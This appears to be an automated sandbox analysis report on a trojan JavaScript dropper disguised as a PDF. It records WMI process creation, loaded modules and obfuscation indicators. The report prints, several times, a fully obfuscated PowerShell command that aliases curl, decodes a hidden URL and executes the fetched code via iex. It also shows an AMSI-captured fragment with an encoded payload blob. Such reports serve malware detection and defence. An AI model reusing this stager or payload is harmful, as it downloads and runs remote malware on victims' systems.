    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79910993215.0000016D3A4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2B9B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1

    System Summary

    barindex
    Windows Scripting host queries suspicious COM object (likely to drop second stage)
    Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFCF414A7A23_2_00007FFCF414A7A2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFCF41499F63_2_00007FFCF41499F6
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFCF4132DD23_2_00007FFCF4132DD2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFCF41325DA3_2_00007FFCF41325DA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFCF413D6AD3_2_00007FFCF413D6AD
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFCF413235A3_2_00007FFCF413235A
    Source: _DRP12938938231_PDF.jsInitial sample: Strings found which are bigger than 50
    Source: classification engineClassification label: mal100.troj.expl.evad.winJS@4/5@3/3
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmpm5aiq.jad.ps1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $b1gsm9ntck4h507.(([system.String]::new(@((405-338),(1368-(9095-7838)),(268800/2400),(1726-1605),(22848/272),(-6863+(-2950+9924))))))( $qk3t4vcxwfd9gb6 ) $b1gsm9ntck4h507.((-join (@((-4679+(2017050/425)),(-43+151),(-3835+(9923-5977)),(7690-7575),(-4684+4785))| ForEach-Object { [char]$_ })))()$smhw5bovtk7cz9j.(([system.String]::new(@((-4801+4868),(10033-9925),(69597/627),(631810/(7227-1733)),(586810/5810)))))()[byte[]] $z7unxof9wj6ycia = $qk3t4vcxwfd9gb6.((-join (@((-7159+7243),(8998-(11154-2267)),(-7255+(-2470+9790)),(-8036+(8682-532)),(531012/(3990+(-891+(-2861+4420)))),(-3403+(-1971+5471)),(4323-(1093+3109)))| ForEach-Object { [char]$_ })))() $mwox20rhsqkpul8=$z7unxof9wj6ycia return $mwox20rhsqkpul8}[System.Text.Encoding]::ascii.(([system.String]::new(@((8440-8369),(315524/(2173+951)),(62756/(-8050+(10853-2262))),(-5175+5258),(786132/6777),(274170/(-856+(8570-5309))),(5617-5512),(146080/1328),(4213-(2590+1520))))))((yxc4fwklvgno53qhtd7zsp8i10a "a+N+MTN3ZHEwesf1LwdrZkHy+1L0hYOuFA544uCdGc5sanAO5qElV7O7J284WcJKvspboAE+PYPshI2XIoULGdlhDrfC9ktwgYGoikWizsSe0N3Wg+2LSseal/pzXa3RzpCIXmSQW43MkrmFo2f5f+zrWg9BBxQfipCUzcmDqYS32cmlE7fLz9qm/25KBtqRu7udxIwpmoDWv6k5o8/hTo5J3Q9BDx4Ri/lN7OzYuyyo542Yi96phmMlqipZr32RFdeAIc/FS6ChX9j++5G6ht2h2QaZn7qlwmfDlCELuyO6izo5APfUmmh81Zsq3+Ta4H4Dcmwrixjv1deJzoQ1PxKOioiUzUe6rOebP4KB2p9XsuvpzcWjb8aGjio8sRzjxYwTrqCUbf8RysY8LXsdvlgbMbqEkTHkGSFP6AkFig/9r1uTJjuVJxpzg+I7IazLrI4qfg7OCS5IdCkCWqQ5hL+Kvsv78RUS85OJg8ikoZRL5l4QwpaT4ETQ695DRY3QCpSa1cHsx47phxji3dfIy9qdnoXxh90wK/brTsi6My6p5dz4+Qs49Fi4rZSAyq8G74Lui4KS53h+IQEn+Vdx1iEMi7D4Y58891ZYaaDiIkeJdU9VmIElR+KgyRHiA31Q5gEkGFg4peppAKeyyZPe4rlKF7+BkSPXzPwS4SvkjxxfxKYPPT/OzqnK8rsFzscK469lU3yyyOIEIwUHCKAnt/tpL7xJM9y3/RS8EwiaWuZR9bNX9PLBaZhOP9gY/xlpCEWN++EVhHgNHnSn4tCoXI2wVn6IbcULjrzh75GqBtyV3Mcor4gsCfjS4GHZkDQWHPlXidrBi1zMT1Yxs6WGVr1w09+M8s48jbasa9yBk1zgkJ64kJ6Q6Ha4CQfXYojsa00I+Lr3hpcf7RGuxbHcI8QrNzhVZmVwtBL9Tzrm931IvbQwZgPZCKpgBu8hlakYwK8p7YgNGQfJgruQnJKE5NqGqy7ogcXxG0m2Xw6KBQbAjoaXoYHZiqz4+k8NhYy/sb2drqXw34wqjW3vwaCLJGHrBBfTfo6fcmDiqyeVwYQBgKCPWRDb1hFolI5m0MxE3S4qH0YLSRIq+Nb5KN5mm70UuZ635wSnmKQbhHSws6mttUdo+hDq68KG56yXsbH9m3eaT86vcsl5DlPCj4wcn/KWv7ztSBPjOrDZaFT5/YCr/tXtf3P9h6jEbF0iS15uYLHwPg19TgPBxPXQ8TTdHNE0f2DJaxXnTe5wLRspJz5/TfasVNaRsTCTYbpwIS1HGCK3bUG7ocJ9amQRFTkKCpWtPFZFGyzrk+bWwO9Ef9PcZZtbPIg861ldiR/PoosRzJI0FSNESmGFy5bqXRDU5oL12Y2cQ6lyWN+WxixrYI4PQBubmZ9ZnyyZSebItend/RvNvtVnp8+bxZsodI8E573Ez2n3PU7XmukuwthNJkSRkLTqF+TevabfeE87PoVL91TMG7EpTTVxbzTYkR8hZs0YfVDTKtbfpH8Wmf745pEV/4DctR66iRU/1fB3tHwgaKO3uphzf9+tMdDB5tCcMZ7BYtZHLLCfCmG4QQuMTA43g/S06VVYhf3CMb7q91aUj7dpjlD6OBvQQTfPatJobXrfWM+TVqqoWFCVMPMrF0NtExoHG/FrRr93mqcCVZNXM+pG+kFGTDrMpk6DYoY79xfGgrfTZI3a2xCq+ITLkZPPxmHWs85hz5V69LVXbbLIe6yydvLTAoHRYbPlO4JKE32ynmza879mCC2v6k6IG3E7hoOZWq1amfYVwA/0+I4JH0SrNniW/XIRuVbAgihKDbPnQXCm94Yk/rb84HMOFmyNf5r31Que2HYvZG9cNqVnvHa24KUtL/Y4OyIaVj2olNfViDM+Hw9ui4qP1xNGfD7dPtnoIghRzTHXR14zSt2Y5Y30SGt1hjF/yguc/D0Jgmd3J/gWX/Idd20zsAu5vIviKLWxZRJu5V
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: _DRP12938938231_PDF.jsReversingLabs: Detection: 15%
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)Jump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: m.Core.pdb source: powershell.exe, 00000003.00000002.79918722425.0000016D428AE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000003.00000002.79920045431.0000016D42C41000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000003.00000002.79920045431.0000016D42BCD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.79922477696.0000016D42F16000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.79920045431.0000016D42C41000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000003.00000002.79921044319.0000016D42C8E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.79921813941.0000016D42CFE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb` source: powershell.exe, 00000003.00000002.79920045431.0000016D42C41000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000003.00000002.79921813941.0000016D42CFE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.79922477696.0000016D42EE0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.79920045431.0000016D42BCD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79921044319.0000016D42C87000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: *n.pdb source: powershell.exe, 00000003.00000002.79918722425.0000016D428AE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbm source: powershell.exe, 00000003.00000002.79923029249.0000016D42F2C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ows\System.Core.pdb`8 source: powershell.exe, 00000003.00000002.79918722425.0000016D428AE000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Obfuscated command line found
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFCF401D2A5 pushad ; iretd 3_2_00007FFCF401D2A6
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFCF41380B8 push ebx; ret 3_2_00007FFCF413814A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFCF4410A89 push esi; retf 3_2_00007FFCF4410AAA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFCF4410379 push edx; retf 3_2_00007FFCF441037A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFCF4413714 pushfd ; retf 3_2_00007FFCF441372A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFCF441A5DB push eax; retf 3_2_00007FFCF441A6FA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFCF4417212 push es; retf 3_2_00007FFCF4417217

    Persistence and Installation Behavior

    barindex
    Creates processes via WMI
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
